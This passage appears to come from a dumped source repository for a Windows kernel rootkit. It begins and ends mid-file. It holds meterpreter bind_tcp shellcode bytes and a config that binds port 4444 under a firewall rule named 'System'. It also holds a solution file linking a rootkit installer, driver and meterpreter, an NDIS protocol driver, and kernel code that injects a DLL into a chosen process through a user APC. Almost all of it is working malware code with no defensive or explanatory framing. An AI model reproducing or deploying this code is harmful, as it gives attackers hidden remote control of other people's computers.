EXITFUNC=thread, \n * AutoLoadStdapi=true, InitialAutoRunScript=, AutoRunScript=, \n * AutoSystemInfo=true, EnableUnicodeEncoding=true\n */\nunsigned char bind_tcp_stage_1[] = \n\"\\xfc\\xe8\\x89\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xd2\\x64\\x8b\\x52\\x30\"\n\"\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\\x4a\\x26\\x31\\xff\"\n\"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\\x0d\\x01\\xc7\\xe2\"\n\"\\xf0\\x52\\x57\\x8b\\x52\\x10\\x8b\\x42\\x3c\\x01\\xd0\\x8b\\x40\\x78\\x85\"\n\"\\xc0\\x74\\x4a\\x01\\xd0\\x50\\x8b\\x48\\x18\\x8b\\x58\\x20\\x01\\xd3\\xe3\"\n\"\\x3c\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\\xff\\x31\\xc0\\xac\\xc1\\xcf\\x0d\"\n\"\\x01\\xc7\\x38\\xe0\\x75\\xf4\\x03\\x7d\\xf8\\x3b\\x7d\\x24\\x75\\xe2\\x58\"\n\"\\x8b\\x58\\x24\\x01\\xd3\\x66\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\"\n\"\\x04\\x8b\\x01\\xd0\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\"\n\"\\xe0\\x58\\x5f\\x5a\\x8b\\x12\\xeb\\x86\\x5d\\x68\\x33\\x32\\x00\\x00\\x68\"\n\"\\x77\\x73\\x32\\x5f\\x54\\x68\\x4c\\x77\\x26\\x07\\xff\\xd5\\xb8\\x90\\x01\"\n\"\\x00\\x00\\x29\\xc4\\x54\\x50\\x68\\x29\\x80\\x6b\\x00\\xff\\xd5\\x50\\x50\"\n\"\\x50\\x50\\x40\\x50\\x40\\x50\\x68\\xea\\x0f\\xdf\\xe0\\xff\\xd5\\x97\\x31\"\n\"\\xdb\\x53\\x68\\x02\\x00\\x11\\x5c\\x89\\xe6\\x6a\\x10\\x56\\x57\\x68\\xc2\"\n\"\\xdb\\x37\\x67\\xff\\xd5\\x53\\x57\\x68\\xb7\\xe9\\x38\\xff\\xff\\xd5\\x53\"\n\"\\x53\\x57\\x68\\x74\\xec\\x3b\\xe1\\xff\\xd5\\x57\\x97\\x68\\x75\\x6e\\x4d\"\n\"\\x61\\xff\\xd5\\x6a\\x00\\x6a\\x04\\x56\\x57\\x68\\x02\\xd9\\xc8\\x5f\\xff\"\n\"\\xd5\\x8b\\x36\\x6a\\x40\\x68\\x00\\x10\\x00\\x00\\x56\\x6a\\x00\\x68\\x58\"\n\"\\xa4\\x53\\xe5\\xff\\xd5\\x93\\x53\\x6a\\x00\\x56\\x53\\x57\\x68\\x02\\xd9\"\n\"\\xc8\\x5f\\xff\\xd5\\x01\\xc3\\x29\\xc6\\x85\\xf6\\x75\\xec\\xc3\";\n" }, { "path": "src/meterpreter_config.h", "content": "\r\n/**\r\n * Payload that should use to build DLL for injection \r\n * into the user-mode process.\r\n */\r\n#include \"meterpreter_bind_tcp.h\"\r\n\r\n#define PAYLOAD bind_tcp_stage_1\r\n\r\n#define LISTEN_PORT 4444\r\n\r\n#define FIREWALL_RULE_NAME \"System\"\r\n" }, { "path": "src/rootkit.sln", "content": "\r\nMicrosoft Visual Studio Solution File, Format Version 10.00\r\n# Visual Studio 2008\r\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"rootkit_installer\", \"rootkit_installer\\rootkit_installer.vcproj\", \"{8A5187B5-EA41-4C34-8D5B-4213A281AAFB}\"\r\n\tProjectSection(ProjectDependencies) = postProject\r\n\t\t{3EEAAF60-1BCB-4114-8B75-168421CD9253} = {3EEAAF60-1BCB-4114-8B75-168421CD9253}\r\n\tEndProjectSection\r\nEndProject\r\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"rootkit_driver\", \"rootkit_driver\\rootkit_driver.vcproj\", \"{3EEAAF60-1BCB-4114-8B75-168421CD9253}\"\r\n\tProjectSection(ProjectDependencies) = postProject\r\n\t\t{07D07B92-3F3F-4054-B224-E9D8324F1FAD} = {07D07B92-3F3F-4054-B224-E9D8324F1FAD}\r\n\tEndProjectSection\r\nEndProject\r\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"meterpreter\", \"meterpreter\\meterpreter.vcproj\", \"{07D07B92-3F3F-4054-B224-E9D8324F1FAD}\"\r\nEndProject\r\nGlobal\r\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\r\n\t\tDebug|Win32 = Debug|Win32\r\n\t\tRelease|Win32 = Release|Win32\r\n\tEndGlobalSection\r\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\r\n\t\t{8A5187B5-EA41-4C34-8D5B-4213A281AAFB}.Debug|Win32.ActiveCfg = Debug|Win32\r\n\t\t{8A5187B5-EA41-4C34-8D5B-4213A281AAFB}.Debug|Win32.Build.0 = Debug|Win32\r\n\t\t{8A5187B5-EA41-4C34-8D5B-4213A281AAFB}.Release|Win32.ActiveCfg = Release|Win32\r\n\t\t{8A5187B5-EA41-4C34-8D5B-4213A281AAFB}.Release|Win32.Build.0 = Release|Win32\r\n\t\t{3EEAAF60-1BCB-4114-8B75-168421CD9253}.Debug|Win32.ActiveCfg = Debug|Win32\r\n\t\t{3EEAAF60-1BCB-4114-8B75-168421CD9253}.Debug|Win32.Build.0 = Debug|Win32\r\n\t\t{3EEAAF60-1BCB-4114-8B75-168421CD9253}.Release|Win32.ActiveCfg = Release|Win32\r\n\t\t{3EEAAF60-1BCB-4114-8B75-168421CD9253}.Release|Win32.Build.0 = Release|Win32\r\n\t\t{07D07B92-3F3F-4054-B224-E9D8324F1FAD}.Debug|Win32.ActiveCfg = Debug|Win32\r\n\t\t{07D07B92-3F3F-4054-B224-E9D8324F1FAD}.Debug|Win32.Build.0 = Debug|Win32\r\n\t\t{07D07B92-3F3F-4054-B224-E9D8324F1FAD}.Release|Win32.ActiveCfg = Release|Win32\r\n\t\t{07D07B92-3F3F-4054-B224-E9D8324F1FAD}.Release|Win32.Build.0 = Release|Win32\r\n\tEndGlobalSection\r\n\tGlobalSection(SolutionProperties) = preSolution\r\n\t\tHideSolutionNode = FALSE\r\n\tEndGlobalSection\r\nEndGlobal\r\n" }, { "path": "src/rootkit_driver/bogusproto.cpp", "content": "\r\n#include \"stdafx.h\"\r\n\r\n// NDIS version: 5.1\r\n#define NDIS51 1\r\n\r\nextern \"C\"\r\n{\r\n#include \r\n}\r\n\r\nNDIS_HANDLE m_hBogusProtocol = NULL;\r\n//--------------------------------------------------------------------------------------\r\nVOID OnBindAdapter(\r\n PNDIS_STATUS Status,\r\n NDIS_HANDLE BindContext,\r\n PNDIS_STRING DeviceNAme,\r\n PVOID SystemSpecific1,\r\n PVOID SystemSpecific2)\r\n{\r\n /*\r\n This function is a required driver function to support Plug and Play.\r\n */\r\n\r\n#ifdef DBG_NDIS_PROT\r\n\r\n DbgMsg(__FUNCTION__\"() called\\n\");\r\n\r\n#endif\r\n}\r\n//--------------------------------------------------------------------------------------\r\nVOID OnOpenAdapterComplete(\r\n NDIS_HANDLE ProtocolBindingContext,\r\n NDIS_STATUS Status,\r\n NDIS_STATUS OpenErrorStatus)\r\n{\r\n /*\r\n This function is a required driver function that completes processing of a binding \r\n operation for which NdisOpenAdapter returned NDIS_STATUS_PENDING.\r\n */\r\n\r\n#ifdef DBG_NDIS_PROT\r\n\r\n DbgMsg(__FUNCTION__\"() called\\n\");\r\n\r\n#endif\r\n}\r\n//--------------------------------------------------------------------------------------\r\nVOID OnUnbindAdapter(\r\n PNDIS_STATUS Status,\r\n NDIS_HANDLE ProtocolBindingContext,\r\n NDIS_HANDLE UnbindContext)\r\n{\r\n /*\r\n This function is a required function to support Plug and Play.\r\n */\r\n\r\n#ifdef DBG_NDIS_PROT\r\n\r\n DbgMsg(__FUNCTION__\"() called\\n\");\r\n\r\n#endif\r\n}\r\n//--------------------------------------------------------------------------------------\r\nVOID OnUnload(VOID)\r\n{\r\n#ifdef DBG_NDIS_PROT\r\n\r\n DbgMsg(__FUNCTION__\"() called\\n\");\r\n\r\n#endif\r\n}\r\n//--------------------------------------------------------------------------------------\r\nVOID OnCloseAdapterComplete(\r\n NDIS_HANDLE ProtocolBindingContext,\r\n NDIS_STATUS Status)\r\n{\r\n /*\r\n This function is a required driver function that completes processing for an unbinding \r\n operation for which NdisCloseAdapter returned NDIS_STATUS_PENDING.\r\n */\r\n\r\n#ifdef DBG_NDIS_PROT\r\n\r\n DbgMsg(__FUNCTION__\"() called\\n\");\r\n\r\n#endif\r\n}\r\n//--------------------------------------------------------------------------------------\r\nVOID OnResetComplete(\r\n NDIS_HANDLE ProtocolBindingContext,\r\n NDIS_STATUS Status)\r\n{\r\n /*\r\n This function is a required driver function that completes a protocol-initiated reset \r\n operation for which NdisReset returned NDIS_STATUS_PENDING.\r\n */\r\n\r\n#ifdef DBG_NDIS_PROT\r\n\r\n DbgMsg(__FUNCTION__\"() called\\n\");\r\n\r\n#endif\r\n}\r\n//--------------------------------------------------------------------------------------\r\nVOID OnRequestComplete(\r\n NDIS_HANDLE ProtocolBindingContext,\r\n PNDIS_REQUEST NdisRequest,\r\n NDIS_STATUS Status)\r\n{\r\n /*\r\n This function is a required driver function that completes the processing of a \r\n protocol-initiated query or set for which NdisRequest returned NDIS_STATUS_PENDING.\r\n */\r\n\r\n#ifdef DBG_NDIS_PROT\r\n\r\n DbgMsg(__FUNCTION__\"() called\\n\");\r\n\r\n#endif\r\n}\r\n//--------------------------------------------------------------------------------------\r\nVOID OnStatus(\r\n NDIS_HANDLE ProtocolBindingContext,\r\n NDIS_STATUS GeneralStatus,\r\n PVOID StatusBuffer,\r\n UINT StatusBufferSize)\r\n{\r\n /*\r\n This function is a required driver function that handles status-change notifications \r\n raised by an underlying connectionless network adapter driver or by NDIS.\r\n */\r\n\r\n#ifdef DBG_NDIS_PROT\r\n\r\n DbgMsg(__FUNCTION__\"() called\\n\");\r\n\r\n#endif\r\n}\r\n//--------------------------------------------------------------------------------------\r\nVOID OnStatusComplete(NDIS_HANDLE ProtocolBindingContext)\r\n{\r\n /*\r\n This function is a required driver function that completes a status-change operation \r\n initiated when the underlying driver called NdisMIndicateStatus.\r\n */\r\n\r\n#ifdef DBG_NDIS_PROT\r\n\r\n DbgMsg(__FUNCTION__\"() called\\n\");\r\n\r\n#endif\r\n}\r\n//--------------------------------------------------------------------------------------\r\nVOID OnSendComplete(\r\n NDIS_HANDLE ProtocolBindingContext,\r\n PNDIS_PACKET Packet,\r\n NDIS_STATUS Status)\r\n{\r\n /*\r\n This function is a required driver function that completes the processing of a \r\n protocol-initiated send previously passed to NdisSendPackets or NdisSend, which \r\n returned NDIS_STATUS_PENDING.\r\n */\r\n\r\n#ifdef DBG_NDIS_PROT\r\n\r\n DbgMsg(__FUNCTION__\"() called\\n\");\r\n\r\n#endif\r\n} \r\n//--------------------------------------------------------------------------------------\r\nVOID OnTransferDataComplete(\r\n NDIS_HANDLE ProtocolBindingContext,\r\n PNDIS_PACKET Packet,\r\n NDIS_STATUS Status,\r\n UINT BytesTransferred)\r\n{\r\n /*\r\n This function is a required driver function if the protocol might bind itself to an \r\n underlying connectionless network adapter driver that does not indicate full-packet \r\n receives with NdisMIndicateReceivePacket. ProtocolTransferDataComplete completes the \r\n processing of a protocol-initiated transfer-data request for which NdisTransferData \r\n returned NDIS_STATUS_PENDING.\r\n */\r\n\r\n#ifdef DBG_NDIS_PROT\r\n\r\n DbgMsg(__FUNCTION__\"() called\\n\");\r\n\r\n#endif\r\n}\r\n//--------------------------------------------------------------------------------------\r\nNDIS_STATUS OnReceive(\r\n NDIS_HANDLE ProtocolBindingContext,\r\n NDIS_HANDLE MacReceiveContext,\r\n PVOID HeaderBuffer,\r\n UINT HeaderBufferSize,\r\n PVOID LookAheadBuffer,\r\n UINT LookAheadBufferSize,\r\n UINT PacketSize)\r\n{\r\n /*\r\n This function is a required driver function in NDIS protocols that bind themselves \r\n to connectionless network adapter drivers. ProtocolReceive determines whether a received \r\n network packet is of interest to the protocol's clients and, if so, copies the indicated \r\n data and, possibly, calls NdisTransferData to retrieve the rest of the indicated packet.\r\n */\r\n\r\n#ifdef DBG_NDIS_PROT\r\n\r\n DbgMsg(__FUNCTION__\"() called\\n\");\r\n\r\n#endif\r\n\r\n return STATUS_SUCCESS;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nVOID OnReceiveComplete(NDIS_HANDLE ProtocolBindingContext)\r\n{\r\n /*\r\n This function is a required driver function in any protocol. ProtocolReceiveComplete \r\n completes post-processing of one or more preceding receive indications from a network \r\n adapter driver.\r\n */\r\n\r\n#ifdef DBG_NDIS_PROT\r\n\r\n DbgMsg(__FUNCTION__\"() called\\n\");\r\n\r\n#endif\r\n}\r\n//--------------------------------------------------------------------------------------\r\nINT OnReceivePacket(\r\n NDIS_HANDLE ProtocolBindingContext,\r\n PNDIS_PACKET Packet)\r\n{\r\n /*\r\n ProtocolReceivePacket is an optional driver function that processes receive indications \r\n made by underlying connectionless NIC driver(s) that call either NdisMIndicateReceivePacket \r\n with packet arrays because the underlying driver supports multipacket receive indications \r\n or with individual packets that have associated out-of-band information. A call to \r\n ProtocolReceivePacket can also occur as a result of loopback.\r\n */\r\n\r\n#ifdef DBG_NDIS_PROT\r\n\r\n DbgMsg(__FUNCTION__\"() called\\n\");\r\n\r\n#endif\r\n\r\n return STATUS_SUCCESS;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nNDIS_STATUS OnPnPHandler(\r\n NDIS_HANDLE ProtocolBindingContext,\r\n PNET_PNP_EVENT pNetPnPEvent)\r\n{\r\n#ifdef DBG_NDIS_PROT\r\n\r\n DbgMsg(__FUNCTION__\"() called\\n\");\r\n\r\n#endif\r\n \r\n return STATUS_SUCCESS;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nNDIS_STATUS OnPnPNetEventReconfigure(\r\n ULONG pAdapt,\r\n PNET_PNP_EVENT pNetPnPEvent)\r\n{\r\n#ifdef DBG_NDIS_PROT\r\n\r\n DbgMsg(__FUNCTION__\"() called\\n\");\r\n\r\n#endif\r\n \r\n return STATUS_SUCCESS;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nNDIS_STATUS OnPnPNetEventSetPower(\r\n ULONG pAdapt,\r\n PNET_PNP_EVENT pNetPnPEvent)\r\n{\r\n#ifdef DBG_NDIS_PROT\r\n\r\n DbgMsg(__FUNCTION__\"() called\\n\");\r\n \r\n#endif\r\n\r\n return STATUS_SUCCESS;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nNDIS_HANDLE BogusProtocolRegister(void)\r\n{\r\n if (m_hBogusProtocol)\r\n {\r\n#ifdef DBG_NDIS_PROT\r\n\r\n // protocol is allready registered\r\n DbgMsg(__FUNCTION__\"(): Protocol is allready registered\\n\");\r\n\r\n#endif\r\n return m_hBogusProtocol;\r\n }\r\n\r\n NDIS_STATUS status = STATUS_SUCCESS; \r\n NDIS_PROTOCOL_CHARACTERISTICS Protocol; \r\n\r\n // fill protocol characteristics structure\r\n NdisZeroMemory(&Protocol, sizeof(Protocol));\r\n Protocol.Ndis40Chars.MajorNdisVersion = 0x05;\r\n Protocol.Ndis40Chars.MinorNdisVersion = 0x0;\r\n\r\n Protocol.Ndis40Chars.OpenAdapterCompleteHandler = OnOpenAdapterComplete;\r\n Protocol.Ndis40Chars.CloseAdapterCompleteHandler = OnCloseAdapterComplete;\r\n Protocol.Ndis40Chars.SendCompleteHandler = OnSendComplete;\r\n Protocol.Ndis40Chars.TransferDataCompleteHandler = OnTransferDataComplete;\r\n Protocol.Ndis40Chars.ResetCompleteHandler = OnResetComplete;\r\n Protocol.Ndis40Chars.RequestCompleteHandler = OnRequestComplete;\r\n Protocol.Ndis40Chars.ReceiveHandler = OnReceive;\r\n Protocol.Ndis40Chars.ReceiveCompleteHandler = OnReceiveComplete;\r\n Protocol.Ndis40Chars.StatusHandler = OnStatus;\r\n Protocol.Ndis40Chars.StatusCompleteHandler = OnStatusComplete;\r\n Protocol.Ndis40Chars.BindAdapterHandler = OnBindAdapter;\r\n Protocol.Ndis40Chars.UnbindAdapterHandler = OnUnbindAdapter;\r\n Protocol.Ndis40Chars.UnloadHandler = OnUnload;\r\n Protocol.Ndis40Chars.ReceivePacketHandler = OnReceivePacket;\r\n Protocol.Ndis40Chars.PnPEventHandler = OnPnPHandler;\r\n\r\n NDIS_STRING ProtocolName;\r\n NdisInitUnicodeString(&ProtocolName, L\"BogusProto\");\r\n Protocol.Ndis40Chars.Name = ProtocolName;\r\n\r\n // register our bogus protocol\r\n NdisRegisterProtocol(\r\n &status, \r\n &m_hBogusProtocol, \r\n &Protocol, \r\n sizeof(Protocol)\r\n );\r\n if (status != NDIS_STATUS_SUCCESS)\r\n {\r\n DbgMsg(\"NdisRegisterProtocol() fails; status: 0x%.8x\\n\", status);\r\n return NULL;\r\n }\r\n \r\n#ifdef DBG_NDIS_PROT\r\n\r\n DbgMsg(__FUNCTION__\"(): Protocol registered\\n\");\r\n\r\n#endif\r\n\r\n return m_hBogusProtocol; \r\n}\r\n//--------------------------------------------------------------------------------------\r\nvoid BogusProtocolUnregister(void)\r\n{\r\n if (m_hBogusProtocol)\r\n {\r\n NDIS_STATUS status = STATUS_SUCCESS;\r\n NdisDeregisterProtocol(&status, m_hBogusProtocol);\r\n m_hBogusProtocol = NULL;\r\n } \r\n}\r\n//--------------------------------------------------------------------------------------\r\n// EoF\r\n" }, { "path": "src/rootkit_driver/bogusproto.h", "content": "\r\nNDIS_HANDLE BogusProtocolRegister(void);\r\nvoid BogusProtocolUnregister(void);\r\n" }, { "path": "src/rootkit_driver/debug.h", "content": "\r\n#ifdef DBGMSG\r\n\r\n// debug messages is on\r\n#define DbgMsg DbgPrint\r\n\r\n#else\r\n\r\n#define DbgMsg\r\n\r\n#endif\r\n" }, { "path": "src/rootkit_driver/dll_inject.cpp", "content": "#include \"stdafx.h\"\r\n#include \"dll_inject_shellcode.h\"\r\n\r\nULONG SDT_NtProtectVirtualMemory = 0;\r\nint m_KTHREAD_ApcState = -1;\r\n\r\nKEVENT m_ApcEvent;\r\n//--------------------------------------------------------------------------------------\r\n#ifdef _X86_\r\n\r\n__declspec(naked) NTSTATUS NTAPI _ZwProtectVirtualMemory(\r\n HANDLE ProcessHandle,\r\n PVOID *BaseAddress,\r\n PSIZE_T NumberOfBytesToProtect,\r\n ULONG NewAccessProtection,\r\n PULONG OldAccessProtection)\r\n{\r\n __asm\r\n {\r\n cmp SDT_NtProtectVirtualMemory, 0\r\n jz _failed\r\n mov eax, SDT_NtProtectVirtualMemory\r\n lea edx, [esp + 4]\r\n int 0x2e\r\n retn 0x14\r\n\r\n_failed:\r\n mov eax, 0xc00000001\r\n retn 0x14\r\n }\r\n}\r\n\r\n#endif // _X86_\r\n//--------------------------------------------------------------------------------------\r\nULONG GetShellcodeSize(PVOID Data)\r\n{\r\n ULONG Size = 0;\r\n PULONG Ptr = (PULONG)Data;\r\n\r\n // get size of shellcode\r\n while (*Ptr != ENDM)\r\n {\r\n Size += 1;\r\n\r\n // check for end marker\r\n Ptr = (PULONG)((ULONG)Ptr + 1); \r\n }\r\n\r\n return Size;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nvoid InjectKernelApcRoutine(\r\n struct _KAPC *Apc, \r\n PKNORMAL_ROUTINE *NormalRoutine, \r\n PVOID *NormalContext, \r\n PVOID *SystemArgument1, \r\n PVOID *SystemArgument2) \r\n{\r\n DbgMsg(__FUNCTION__\"()\\n\");\r\n KeSetEvent(&m_ApcEvent, 0, FALSE);\r\n}\r\n//--------------------------------------------------------------------------------------\r\nBOOLEAN InjectFindProcess(PWSTR ProcessName, ULONG ProcessId, PKTHREAD *pThread, PEPROCESS *pProcess)\r\n{\r\n BOOLEAN bRet = FALSE;\r\n UNICODE_STRING usProcessName;\r\n\r\n if (ProcessName)\r\n {\r\n RtlInitUnicodeString(&usProcessName, ProcessName);\r\n } \r\n\r\n *pThread = NULL;\r\n *pProcess = NULL;\r\n\r\n PSYSTEM_PROCESSES_INFORMATION pProcessesInfo = (PSYSTEM_PROCESSES_INFORMATION)\r\n RuntimeGetSystemInformation(SystemProcessInformation);\r\n if (pProcessesInfo)\r\n {\r\n PSYSTEM_PROCESSES_INFORMATION pInfo = pProcessesInfo;\r\n\r\n // iterate processes list\r\n while (pInfo)\r\n {\r\n if (pInfo->ProcessName.Buffer &&\r\n pInfo->ThreadCount > 0)\r\n {\r\n // match by process name or ID\r\n if ((ProcessName != NULL && RtlEqualUnicodeString(&pInfo->ProcessName, &usProcessName, TRUE)) ||\r\n (ProcessId != 0 && pInfo->ProcessId == ProcessId))\r\n {\r\n DbgMsg(\r\n __FUNCTION__\"(): \\\"%wZ\\\", PID = %d\\n\", \r\n &pInfo->ProcessName, pInfo->ProcessId\r\n );\r\n\r\n NTSTATUS ns = PsLookupThreadByThreadId(\r\n pInfo->Threads[0].ClientId.UniqueThread, \r\n (PETHREAD *)pThread\r\n );\r\n if (!NT_SUCCESS(ns))\r\n {\r\n DbgMsg(\"PsLookupProcessByProcessId() ERROR; status: 0x%.8x\\n\", ns);\r\n }\r\n\r\n ns = PsLookupProcessByProcessId(\r\n (HANDLE)pInfo->ProcessId, \r\n pProcess\r\n );\r\n if (!NT_SUCCESS(ns))\r\n {\r\n DbgMsg(\"PsLookupProcessByProcessId() ERROR; status: 0x%.8x\\n\", ns);\r\n }\r\n\r\n if (*pThread && *pProcess)\r\n {\r\n bRet = TRUE;\r\n break;\r\n }\r\n else\r\n {\r\n if (*pThread)\r\n {\r\n ObDereferenceObject(*pThread);\r\n *pThread = NULL;\r\n }\r\n\r\n if (*pProcess)\r\n {\r\n ObDereferenceObject(*pProcess);\r\n *pProcess = NULL;\r\n }\r\n }\r\n }\r\n }\r\n\r\n if (pInfo->NextEntryDelta == 0)\r\n {\r\n // end of the list\r\n break;\r\n }\r\n\r\n pInfo = (PSYSTEM_PROCESSES_INFORMATION)((PUCHAR)pInfo + pInfo->NextEntryDelta);\r\n }\r\n\r\n ExFreePool(pProcessesInfo);\r\n }\r\n\r\n return bRet;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nBOOLEAN ImjectMapDllImage(HANDLE hProcess, PVOID Data, ULONG DataSize, PVOID *pRetImage)\r\n{\r\n PIMAGE_NT_HEADERS pHeaders = (PIMAGE_NT_HEADERS)RVATOVA(\r\n Data,\r\n ((PIMAGE_DOS_HEADER)Data)->e_lfanew\r\n );\r\n\r\n PVOID Image = NULL;\r\n ULONG ImageSize = pHeaders->OptionalHeader.SizeOfImage;\r\n\r\n // allocate memory for image\r\n NTSTATUS ns = ZwAllocateVirtualMemory(\r\n hProcess,\r\n (PVOID *)&Image,\r\n 0,\r\n &ImageSize,\r\n MEM_COMMIT | MEM_RESERVE,\r\n PAGE_EXECUTE_READWRITE\r\n );\r\n if (NT_SUCCESS(ns))\r\n {\r\n DbgMsg(__FUNCTION__\"(): Memory for image allocated at \"IFMT\"\\n\", Image);\r\n\r\n __try\r\n {\r\n // copy headers\r\n RtlZeroMemory(Image, ImageSize);\r\n RtlCopyMemory(Image, Data, pHeaders->OptionalHeader.SizeOfHeaders);\r\n\r\n // copy sections\r\n PIMAGE_SECTION_HEADER pSection = (PIMAGE_SECTION_HEADER)\r\n ((PUCHAR)&pHeaders->OptionalHeader + \r\n pHeaders->FileHeader.SizeOfOptionalHeader);\r\n\r\n for (ULONG i = 0; i < pHeaders->FileHeader.NumberOfSections; i++)\r\n {\r\n RtlCopyMemory(\r\n RVATOVA(Image, pSection->VirtualAddress), \r\n RVATOVA(Data, pSection->PointerToRawData),\r\n min(pSection->SizeOfRawData, pSection->Misc.VirtualSize)\r\n );\r\n\r\n pSection++;\r\n } \r\n\r\n // parse image base relocations\r\n if (RuntimeProcessRelocs(Image, Image))\r\n {\r\n *pRetImage = Image;\r\n return TRUE;\r\n }\r\n }\r\n __except(EXCEPTION_EXECUTE_HANDLER)\r\n {\r\n DbgMsg(__FUNCTION__\"() EXCEPTION\\n\");\r\n } \r\n\r\n ZwFreeVirtualMemory(hProcess, &Image, 0, MEM_RELEASE);\r\n }\r\n else\r\n {\r\n DbgMsg(\"ZwAllocateVirtualMemory() fails; status: 0x%.8x\\n\", ns);\r\n }\r\n\r\n return NULL;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nBOOLEAN InjectIntoProcess(PEPROCESS Process, PKTHREAD Thread, PVOID Data, ULONG DataSize)\r\n{\r\n\r\n#ifdef USE_PARANOID_CHEKS\r\n\r\n if (m_KTHREAD_ApcState < 0)\r\n {\r\n DbgMsg(__FUNCTION__\"() ERROR: Some offsets are not initialized\\n\");\r\n return FALSE;\r\n }\r\n\r\n#endif // USE_PARANOID_CHEKS\r\n\r\n BOOLEAN bRet = FALSE;\r\n HANDLE hProcess = NULL;\r\n\r\n // get handle to the target process\r\n NTSTATUS ns = ObOpenObjectByPointer(\r\n Process,\r\n OBJ_KERNEL_HANDLE,\r\n NULL,\r\n 0,\r\n NULL,\r\n KernelMode,\r\n &hProcess\r\n );\r\n if (NT_SUCCESS(ns))\r\n {\r\n PROCESS_BASIC_INFORMATION ProcessInfo; \r\n\r\n // get address of PEB\r\n ns = ZwQueryInformationProcess(\r\n hProcess,\r\n ProcessBasicInformation,\r\n &ProcessInfo,\r\n sizeof(ProcessInfo),\r\n NULL\r\n );\r\n if (!NT_SUCCESS(ns))\r\n {\r\n DbgMsg(\"ZwQueryInformationProcess() fails; status: 0x%.8x\\n\", ns);\r\n goto close;\r\n } \r\n\r\n // attach to the process address space\r\n KAPC_STATE ApcState;\r\n KeStackAttachProcess(Process, &ApcState);\r\n\r\n // get process image base from peb\r\n PVOID ProcessImageBase = *(PVOID *)((PUCHAR)ProcessInfo.PebBaseAddress + PEB_IMAGE_BASE_OFFEST);\r\n\r\n // map DLL image into the target process\r\n PVOID Image = NULL;\r\n if (ImjectMapDllImage(hProcess, Data, DataSize, &Image))\r\n {\r\n __try\r\n {\r\n PIMAGE_NT_HEADERS pHeaders = (PIMAGE_NT_HEADERS)RVATOVA(\r\n Image,\r\n ((PIMAGE_DOS_HEADER)Data)->e_lfanew\r\n );\r\n\r\n PVOID ImageEntryPoint = RVATOVA(Image, pHeaders->OptionalHeader.AddressOfEntryPoint);\r\n\r\n DbgMsg(__FUNCTION__\"(): Image entry point is at \"IFMT\"\\n\", ImageEntryPoint);\r\n\r\n PINJ_THREAD_STRUCT InjectStruct = NULL;\r\n ULONG ShellCodeSize = GetShellcodeSize(inj_shellcode);\r\n ULONG InjectStructSize = sizeof(INJ_THREAD_STRUCT) + ShellCodeSize;\r\n\r\n // allocate memory for callgate\r\n NTSTATUS ns = ZwAllocateVirtualMemory(\r\n hProcess,\r\n (PVOID *)&InjectStruct,\r\n 0,\r\n &InjectStructSize,\r\n MEM_COMMIT | MEM_RESERVE,\r\n PAGE_EXECUTE_READWRITE\r\n );\r\n if (NT_SUCCESS(ns))\r\n {\r\n DbgMsg(\"Callgate allocated at \"IFMT\"\\n\", InjectStruct);\r\n\r\n RtlFillMemory(InjectStruct, InjectStructSize, 0x90);\r\n\r\n #define DLL_PROCESS_ATTACH 0x01\r\n\r\n #define REL_OP(_to_, _from_) \\\r\n \\\r\n (ULONG)((PUCHAR)&InjectStruct->##_to_ - \\\r\n (PUCHAR)&InjectStruct->##_from_) - sizeof(ULONG)\r\n\r\n#ifdef _X86_ \r\n InjectStruct->u0_0x68 = 0x68; /* PUSH Image */\r\n InjectStruct->Image = (ULONG)Image;\r\n\r\n InjectStruct->u1_0xE8 = 0xE8; /* CALL ProcessModuleImports */\r\n InjectStruct->ShellCodeAddr = REL_OP(ShellCode, ShellCodeAddr);\r\n \r\n InjectStruct->u2_0xC085 = 0xC085; /* TEST EAX, EAX */\r\n\r\n InjectStruct->u3_0x840F = 0x840F; /* JZ Exit */\r\n InjectStruct->ExitAddr = REL_OP(u8_0xC2, ExitAddr);\r\n\r\n InjectStruct->u4_0x68 = 0x68; /* PUSH 0 */\r\n InjectStruct->param_Reserved = 0;\r\n \r\n InjectStruct->u5_0x68 = 0x68; /* PUSH DLL_PROCESS_ATTACH */\r\n InjectStruct->param_Reason = DLL_PROCESS_ATTACH;\r\n \r\n InjectStruct->u6_0x68 = 0x68; /* PUSH ModuleInstance */\r\n InjectStruct->ModuleInstance = (ULONG)Image;\r\n \r\n InjectStruct->u7_0xE8 = 0xe8; /* CALL ImageEntryPoint */\r\n InjectStruct->ImageEntryPoint = (ULONG)((PUCHAR)ImageEntryPoint - (PUCHAR)&InjectStruct->ImageEntryPoint) - sizeof(ULONG);\r\n \r\n InjectStruct->u8_0xC2 = 0xc2; /* RET 3 */\r\n InjectStruct->param_local_size = 3;\r\n#else // _X86_\r\n\r\n#error __FUNCTION__ is x86 only\r\n\r\n#endif // _X86_\r\n // copy shellcode, that processing module imports\r\n RtlCopyMemory(&InjectStruct->ShellCode, inj_shellcode, ShellCodeSize); \r\n\r\n KAPC Apc;\r\n PKAPC_STATE pThreadApcState = (PKAPC_STATE)((PUCHAR)Thread + m_KTHREAD_ApcState);\r\n\r\n KeInitializeApc(\r\n &Apc, \r\n Thread, \r\n OriginalApcEnvironment, \r\n &InjectKernelApcRoutine, \r\n NULL, \r\n (PKNORMAL_ROUTINE)InjectStruct, \r\n UserMode, \r\n NULL\r\n );\r\n\r\n // enable user APC delivering\r\n pThreadApcState->UserApcPending = TRUE;\r\n\r\n // add routine to the APC queue\r\n if 